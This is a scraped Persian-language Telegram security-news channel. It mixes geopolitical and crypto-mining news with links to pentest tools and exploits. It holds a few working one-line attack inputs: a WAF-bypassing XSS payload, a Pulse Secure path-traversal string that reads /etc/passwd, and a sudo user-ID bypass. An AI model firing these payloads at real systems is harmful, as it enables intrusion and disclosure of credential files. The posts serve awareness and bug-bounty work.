امنیت اطلاعات
مصاحبه راشاتودی با دو فرد روس که متهم به ترور اسکریپال هستند و میگن که برای دیدن کلیسا به شهر سالزبری رفته بودن! :)) #news #russia #gb #england @sec_nerd
اگر حوصله و زمان کافی دارید حتما این گزارش رو بخونید!
یکی از افرادی که در قتل اسکریپال دست داشت ( به ادعای تیم تحقیق Bellingcat) در تصاویر جشن ازدواج فرمانده واحد 29155 ارتش روسیه پیدا شد.
https://www.bellingcat.com/news/uk-and-europe/2019/10/14/averyanov-chepiga/
#news
#russia
#gb
#england
#osint
@sec_nerd
یکی از افرادی که در قتل اسکریپال دست داشت ( به ادعای تیم تحقیق Bellingcat) در تصاویر جشن ازدواج فرمانده واحد 29155 ارتش روسیه پیدا شد.
https://www.bellingcat.com/news/uk-and-europe/2019/10/14/averyanov-chepiga/
#news
#russia
#gb
#england
#osint
@sec_nerd
bellingcat
Skripal Poisoner Attended GRU Commander Family Wedding - bellingcat
In a series of investigative reports in 2018 and this year, Bellingcat and its media partners disclosed the existence of an elite unit within Russian military intelligence (GRU) engaging in clandestine overseas operations. This unit consists of approximately…
کشف آسیب پذیری در Sudo
آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند!
تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل صحیح دو عدد مذکور نیست و آنها را به 0 تبدیل میکند که معادل کاربر root است.
اطلاعات بیشتر:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
#news
#linux
#exploit
#privesc
@sec_nerd
آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند!
تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل صحیح دو عدد مذکور نیست و آنها را به 0 تبدیل میکند که معادل کاربر root است.
اطلاعات بیشتر:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
#news
#linux
#exploit
#privesc
@sec_nerd
امنیت اطلاعات
کشف آسیب پذیری در Sudo آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند! تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل…
asciinema.org
CVE-2019-14287
Recorded by Jas502n
مقام امریکایی که نخواست هویتش افشا شود در مصاحبه با رویترز اعلام کرد ایالات متحده حمله سایبری را در اواخر ماه سپتامبر علیه ایران ترتیب داده است.
این فرد مدعی شد حمله ی مذکور سخت افزار فیزیکی را هدف قرار داده و از اعلام جزییات بیشتری در این خصوص خودداری کرد.
این حمله پس از حمله به تاسیسات نفتی عربستان رخ داده اما پنتاگون در این خصوص اظهار نظر نکرده است.
منبع:
https://www.reuters.com/article/us-usa-iran-military-cyber-exclusive/exclusive-us-carried-out-secret-cyber-strike-on-iran-in-wake-of-saudi-oil-attack-officials-say-idUSKBN1WV0EK
#usa
#iran
#news
@sec_nerd
این فرد مدعی شد حمله ی مذکور سخت افزار فیزیکی را هدف قرار داده و از اعلام جزییات بیشتری در این خصوص خودداری کرد.
این حمله پس از حمله به تاسیسات نفتی عربستان رخ داده اما پنتاگون در این خصوص اظهار نظر نکرده است.
منبع:
https://www.reuters.com/article/us-usa-iran-military-cyber-exclusive/exclusive-us-carried-out-secret-cyber-strike-on-iran-in-wake-of-saudi-oil-attack-officials-say-idUSKBN1WV0EK
#usa
#iran
#news
@sec_nerd
Reuters
Exclusive: U.S. carried out secret cyber strike on Iran in wake of Saudi oil attack: officials
WASHINGTON (Reuters) - The United States carried out a secret cyber operation against Iran in the wake of the Sept. 14 attacks on Saudi Arabia’s oil facilities, which Washington and Riyadh blame on Tehran, two U.S. officials have told Reuters.
ابزارهایی برای بروت فورس کردن پارامترهای GET و POST
https://github.com/Bo0oM/ParamPamPam
https://github.com/s0md3v/Arjun
https://github.com/portswigger/param-miner
https://github.com/maK-/parameth
#web
#pentest
#bugbounty
@sec_nerd
https://github.com/Bo0oM/ParamPamPam
https://github.com/s0md3v/Arjun
https://github.com/portswigger/param-miner
https://github.com/maK-/parameth
#web
#pentest
#bugbounty
@sec_nerd
GitHub
GitHub - Bo0oM/ParamPamPam
Contribute to Bo0oM/ParamPamPam development by creating an account on GitHub.
This media is not supported in your browser
VIEW IN TELEGRAM
sqlbuster
ابزار دامپ کردن دیتابیس های آسیب پذیر در برابر حملات UNION based
https://github.com/geek-repo/sqlbuster
#web
#pentest
#sqli
@sec_nerd
ابزار دامپ کردن دیتابیس های آسیب پذیر در برابر حملات UNION based
https://github.com/geek-repo/sqlbuster
#web
#pentest
#sqli
@sec_nerd
امنیت اطلاعات
کشف آسیب پذیری در Sudo آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند! تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل…
Don't panic! sudo flaw CVE-2019-14287 needs a specific config.
If a sudoers entry is written to allow the user to run a command
as any user except root, the bug can be used to avoid this restriction. Example:
myhost bob = (ALL, !root) /usr/bin/vi
https://www.openwall.com/lists/oss-security/2019/10/14/1
ترجمه:
هول نشید، آسیب پذیری سودو فقط تحت تنظیمات خاصی عمل میکنه.
اگر خط یا خطوطی در فایل sudoers وجود داشته باشه که به کاربری اجازه بده دستوری رو تحت هر دسترسی بجز root اجرا کنه، این محدودیت قابل دور زدن خواهد بود.
https://twitter.com/2xyo/status/1183839706586537985
#linux
#exploit
#privesc
@sec_nerd
If a sudoers entry is written to allow the user to run a command
as any user except root, the bug can be used to avoid this restriction. Example:
myhost bob = (ALL, !root) /usr/bin/vi
https://www.openwall.com/lists/oss-security/2019/10/14/1
ترجمه:
هول نشید، آسیب پذیری سودو فقط تحت تنظیمات خاصی عمل میکنه.
اگر خط یا خطوطی در فایل sudoers وجود داشته باشه که به کاربری اجازه بده دستوری رو تحت هر دسترسی بجز root اجرا کنه، این محدودیت قابل دور زدن خواهد بود.
https://twitter.com/2xyo/status/1183839706586537985
#linux
#exploit
#privesc
@sec_nerd
Twitter
2*yo
Don't panic! sudo flaw CVE-2019-14287 needs a specific config. If a sudoers entry is written to allow the user to run a command as any user except root, the bug can be used to avoid this restriction. Example: myhost bob = (ALL, !root) /usr/bin/vi https:/…
امنیت اطلاعات
کشف آسیب پذیری در Sudo آسیب پذیری با شناسه CVE-2019-14287 به یوزر محدود شده اجازه میدهد تحت شرایط خاصی ، با معرفی خود با آیدی کاربری 1- و یا 4294967295 دستور خود را با سطح کاربری رووت اجرا کند! تابعی که یوزرآیدی را به نام کاربری تبدیل میکند قادر به تبدیل…
شرح کاملتری از آسیب پذیری کشف شده در sudo
https://sysdig.com/blog/detecting-cve-2019-14287/
#linux
#exploit
#sudo
@sec_nerd
https://sysdig.com/blog/detecting-cve-2019-14287/
#linux
#exploit
#sudo
@sec_nerd
Sysdig
How to detect CVE-2019-14287 using Falco | Sysdig
A recent flaw (CVE-2019-14287) has been found in sudo. Learn how to use Falco or Sysdig Secure to detect any exploit attempts against this vulnerability.
شرکت emsisoft برنامه رمزگشای باج افزار Puma را منتشر کرد
این باج افزار فایلهایی با پسوندهای puma و pumas یا pumax ایجاد میکند.
دریافت برنامه:
https://www.emsisoft.com/ransomware-decryption-tools/stop-puma
#ransome
#puma
#ransomware
@sec_nerd
این باج افزار فایلهایی با پسوندهای puma و pumas یا pumax ایجاد میکند.
دریافت برنامه:
https://www.emsisoft.com/ransomware-decryption-tools/stop-puma
#ransome
#puma
#ransomware
@sec_nerd
Emsisoft
STOP Puma decryptor
Free STOP Puma ransomware decryptor by Emsisoft. Unlock your files without paying the ransom.
بعد از فایلهای ویدئویی، اینبار هکرها موفق شدند پیلودهای آلوده خود را در فایلهای WAV جاگذاری کنند.
توضیحات کامل را اینجا بخوانید:
https://threatvector.cylance.com/en_us/home/malicious-payloads-hiding-beneath-the-wav.html
#wav
#backdoor
#rce
@sec_nerd
توضیحات کامل را اینجا بخوانید:
https://threatvector.cylance.com/en_us/home/malicious-payloads-hiding-beneath-the-wav.html
#wav
#backdoor
#rce
@sec_nerd
BlackBerry
Malicious Payloads - Hiding Beneath the WAV
BlackBerry Cylance Threat Researchers recently discovered obfuscated malicious code embedded within WAV audio files. Each WAV file was coupled with a loader component for decoding and executing malicious content secretly woven throughout the file’s audio…
فرارسیدن اربعین حسینی را به همه ی بزرگواران همراه تسلیت عرض میکنیم.
ما رو از دعای خیرتون محروم نفرمایید.
@sec_nerd
ما رو از دعای خیرتون محروم نفرمایید.
@sec_nerd
تو شرکتمون مسئول مصاحبه هستم
اول از همه دیدت این باشه که میتونی مفید باشی؟ هنری داری که بتونه نیاز دیگران رو برآورده کنه؟ میتونی سطح شرکت رو ارتقا بدی و چجوری میتونی موثر باشی؟
کسی که سوال اولش حقوق چقدر میدین باشه، حتی به مصاحبه دعوتش نمیکنم
دوستی که نمیشناسمت و این جملات زیبا رو گفتی، واقعا درست و دقیق بود.
#سخن_نیک
#motivation
@sec_nerd
اول از همه دیدت این باشه که میتونی مفید باشی؟ هنری داری که بتونه نیاز دیگران رو برآورده کنه؟ میتونی سطح شرکت رو ارتقا بدی و چجوری میتونی موثر باشی؟
کسی که سوال اولش حقوق چقدر میدین باشه، حتی به مصاحبه دعوتش نمیکنم
دوستی که نمیشناسمت و این جملات زیبا رو گفتی، واقعا درست و دقیق بود.
#سخن_نیک
#motivation
@sec_nerd
cloudflare «XSS» payload to bypass protection.
🦍
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
#BugBounty #BugBountyTip #WAF #infosec
@sec_nerd
🦍
{` <body \< onscroll =1(_=prompt,_(String.fromCharCode(88,83,83,32,66,121,32,77,111,114,112,104,105,110,101)))> ´}
#BugBounty #BugBountyTip #WAF #infosec
@sec_nerd
هکرهای روس زبان نسخه ی دستکاری شده ی مرورگر tor را تحت عنوان «نسخه اصلی روسی» به کاربران دادند و اقدام به سرقت بیت کوین از آنان کردند.
به گزارش ESET این کمپین کلاهبرداری برای سالها فعال بوده است.
آنان با استفاده از یک پیلود آلوده ی جاوا اسکریپت در سه مارکت بزرگ روسی در دارک نت اقدام به دزدی از کاربران میکرد.
توضیحات بیشتر:
https://www.darkreading.com/attacks-breaches/tor-weaponized-to-steal-bitcoin/d/d-id/1336127
#news
#tor
#malware
#darknet
#russia
@sec_nerd
به گزارش ESET این کمپین کلاهبرداری برای سالها فعال بوده است.
آنان با استفاده از یک پیلود آلوده ی جاوا اسکریپت در سه مارکت بزرگ روسی در دارک نت اقدام به دزدی از کاربران میکرد.
توضیحات بیشتر:
https://www.darkreading.com/attacks-breaches/tor-weaponized-to-steal-bitcoin/d/d-id/1336127
#news
#tor
#malware
#darknet
#russia
@sec_nerd
Dark Reading
Tor Weaponized to Steal Bitcoin
A years-long campaign targets users of Russian darknet markets with a modified install of a privacy-oriented browser.
سلام
یکی از معدود کانالهایی که مطالبش:
۱- به روز هست
۲- کپی نیست
۳- و مفید و کاربردی
هستن کانال https://t.iss.one/web_priv8 هست.
دنبال کنید و به دوستان خودتون هم معرفی کنید.
@web_priv8
@sec_nerd
یکی از معدود کانالهایی که مطالبش:
۱- به روز هست
۲- کپی نیست
۳- و مفید و کاربردی
هستن کانال https://t.iss.one/web_priv8 هست.
دنبال کنید و به دوستان خودتون هم معرفی کنید.
@web_priv8
@sec_nerd
Telegram
Web_Priv8
Sina Doosti @r00t98
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98
Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/r00t98
Amir Hasanvand @al9n3_wolf
Web Security Researcher, Bug Hunter
https://twitter.com/al9n3_wolf
دستورالعمل اجرایی بیت کوین در ایستگاه پایانی/برق ماینرها قطع شد
مصطفی رجبی مشهدی (سخنگوی صنعت برق) در گفتوگو با خبرنگار اقتصادی خبرگزاری فارس، در پاسخ به این سؤال که آیا با توجه به قانونی شدن استخراج رمز ارزها دستورالعمل این قانون تهیه شده است، گفت: وزارت صنعت، معدن و تجارت و وزارت نیرو در حال تهیه دستورالعمل اجرایی استخراج رمز ارزها هستند و این دستورالعمل در مراحل پایانی قرار داشته و به زودی نهایی میشود.
رجبی مشهدی با اشاره به اینکه بر اساس مصوبه دولت به دو شکل تأمین برق برای استخراج رمز ارزها باید صورت بگیرد، گفت: یکی از روشهای تأمین برق تولید بیت کوین این است که تعرفه برق برای ماینرها متوسط برق صادراتی باشد و روش دوم این است که استخراجکنندگان رمز ارزها میتوانند نیروگاه احداث کنند.
وی ادامه داد: متقاضیانی که نیروگاه احداث کنند برای آنها 70 درصد نرخ گاز صادراتی محاسبه میشود و افرادی که نیروگاه تجدیدپذیر احداث کنند نمیتوانند مستقل از شبکه برق باشند، پس باید تا زمان نهایی شدن دستورالعمل که در حال تدوین است منتظر ماند.
* با استفاده از برق ارزان برای ماینینگ برخورد می شود
سخنگوی صنعت برق در پاسخ به این سؤال که تعدادی از ماینرها به دلیل نارضایتی از بابت محاسبه متوسط برق صادراتی برای آنها در حال خروج از ایران هستند و آیا در این مدت مزارع تولید بیتکوین شناسایی شده است، گفت: هر مشترکی که بخواهد از برق ارزان برای تولید بیتکوین و استخراج رمز ارزها استفاده کند با آن برخورد خواهد شد.
وی ادامه داد: یک ماه قبل 150 مگاوات به دلیل همین استفاده از برق ارزان صورتجلسه شده و برق آنها قطع شد.
رجبی مشهدی با اشاره به اینکه عمدتاً این 150 مگاوات مربوط به استانهای شمالی کشور بوده است، گفت: به هر حال مصرف برق بعد از عبور پیک تابستان کاهش مییابد و نیروگاهها به تدریج برای تعمیرات نیروگاهی و آمادگی برای تولید برق در فصل تابستان آماده میشوند پس باید ماینرها به قانون احترام بگذارند و از برق ارزان به خصوص تعرفه برق کشاورزی خودداری کنند.
https://fna.ir/dcm6i8
#news
#btc
#iran
@sec_nerd
مصطفی رجبی مشهدی (سخنگوی صنعت برق) در گفتوگو با خبرنگار اقتصادی خبرگزاری فارس، در پاسخ به این سؤال که آیا با توجه به قانونی شدن استخراج رمز ارزها دستورالعمل این قانون تهیه شده است، گفت: وزارت صنعت، معدن و تجارت و وزارت نیرو در حال تهیه دستورالعمل اجرایی استخراج رمز ارزها هستند و این دستورالعمل در مراحل پایانی قرار داشته و به زودی نهایی میشود.
رجبی مشهدی با اشاره به اینکه بر اساس مصوبه دولت به دو شکل تأمین برق برای استخراج رمز ارزها باید صورت بگیرد، گفت: یکی از روشهای تأمین برق تولید بیت کوین این است که تعرفه برق برای ماینرها متوسط برق صادراتی باشد و روش دوم این است که استخراجکنندگان رمز ارزها میتوانند نیروگاه احداث کنند.
وی ادامه داد: متقاضیانی که نیروگاه احداث کنند برای آنها 70 درصد نرخ گاز صادراتی محاسبه میشود و افرادی که نیروگاه تجدیدپذیر احداث کنند نمیتوانند مستقل از شبکه برق باشند، پس باید تا زمان نهایی شدن دستورالعمل که در حال تدوین است منتظر ماند.
* با استفاده از برق ارزان برای ماینینگ برخورد می شود
سخنگوی صنعت برق در پاسخ به این سؤال که تعدادی از ماینرها به دلیل نارضایتی از بابت محاسبه متوسط برق صادراتی برای آنها در حال خروج از ایران هستند و آیا در این مدت مزارع تولید بیتکوین شناسایی شده است، گفت: هر مشترکی که بخواهد از برق ارزان برای تولید بیتکوین و استخراج رمز ارزها استفاده کند با آن برخورد خواهد شد.
وی ادامه داد: یک ماه قبل 150 مگاوات به دلیل همین استفاده از برق ارزان صورتجلسه شده و برق آنها قطع شد.
رجبی مشهدی با اشاره به اینکه عمدتاً این 150 مگاوات مربوط به استانهای شمالی کشور بوده است، گفت: به هر حال مصرف برق بعد از عبور پیک تابستان کاهش مییابد و نیروگاهها به تدریج برای تعمیرات نیروگاهی و آمادگی برای تولید برق در فصل تابستان آماده میشوند پس باید ماینرها به قانون احترام بگذارند و از برق ارزان به خصوص تعرفه برق کشاورزی خودداری کنند.
https://fna.ir/dcm6i8
#news
#btc
#iran
@sec_nerd
خبرگزاری فارس
دستورالعمل اجرایی استخراج بیتکوین در ایستگاه پایانی/ برق ماینرها قطع شد
سخنگوی صنعت برق با اشاره به اینکه در یک ماه گذشته 150 مگاوات برق ماینرها به دلیل استفاده از برق ارزان برای استخراج رمز ارزها قطع شده است، گفت: وزارت صنعت و نیرو در حال تهیه دستورالعمل اجرایی برای استفاده ماینرها از برق هستند.
امنیت اطلاعات
Pulse Connect Secure versions 9.0RX, 8.3RX, and 8.2RX arbitrary file disclosure CVE-2019-11510 exploit: /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ https://www.exploit-db.com/exploits/47297 #pulse #vpn…
بیش از 14500 سرور Pulse secure در برابر اکسپلویت CVE-2019-11510 آسیب پذیر هستند.
ده کشور اول در این خصوص در تصویر قابل مشاهده است.
نکته جالب، آسیب پذیر بودن سازمان های نظامی و دولتی و شرکت های بزرگ می باشد.
https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/
#pulse
#news
#usa
@sec_nerd
ده کشور اول در این خصوص در تصویر قابل مشاهده است.
نکته جالب، آسیب پذیر بودن سازمان های نظامی و دولتی و شرکت های بزرگ می باشد.
https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/
#pulse
#news
#usa
@sec_nerd
تشریح و اکسپلویت آسیب پذیری Race Condition در وب اپلیکیشن
https://memoryleaks.ir/race-condition-in-web-application/
#web
#RaceCondition
#RC
@sec_nerd
https://memoryleaks.ir/race-condition-in-web-application/
#web
#RaceCondition
#RC
@sec_nerd
مموریلیکس - نگاشتههایی پیرامون امنیت، شبکه و رمزنگاری
آسیبپذیری Race Condition
در این پست میخوایم آسیب پذیری Race Conditon رو تشریح کنیم،اول بگیم که این آسیب پذیری چیه و یه مثال در دنیای واقعی ازش بگیم،بعد بریم یک اسکریپت PHP از گیتهاب که آسیب پذیری Race Condition داره رو کلون و اکسپلویت کنیم.
اکسپلویت اجرای دستور از راه دور بر روی جوملا نسخه ی 3.4.6
https://www.exploit-db.com/exploits/47524
https://github.com/kiks7/rusty_joomla_rce
#joomla
#web
#rce
#pentest
@sec_nerd
https://www.exploit-db.com/exploits/47524
https://github.com/kiks7/rusty_joomla_rce
#joomla
#web
#rce
#pentest
@sec_nerd
Exploit Database
Joomla! 3.4.6 - Remote Code Execution
Joomla! 3.4.6 - Remote Code Execution.. webapps exploit for PHP platform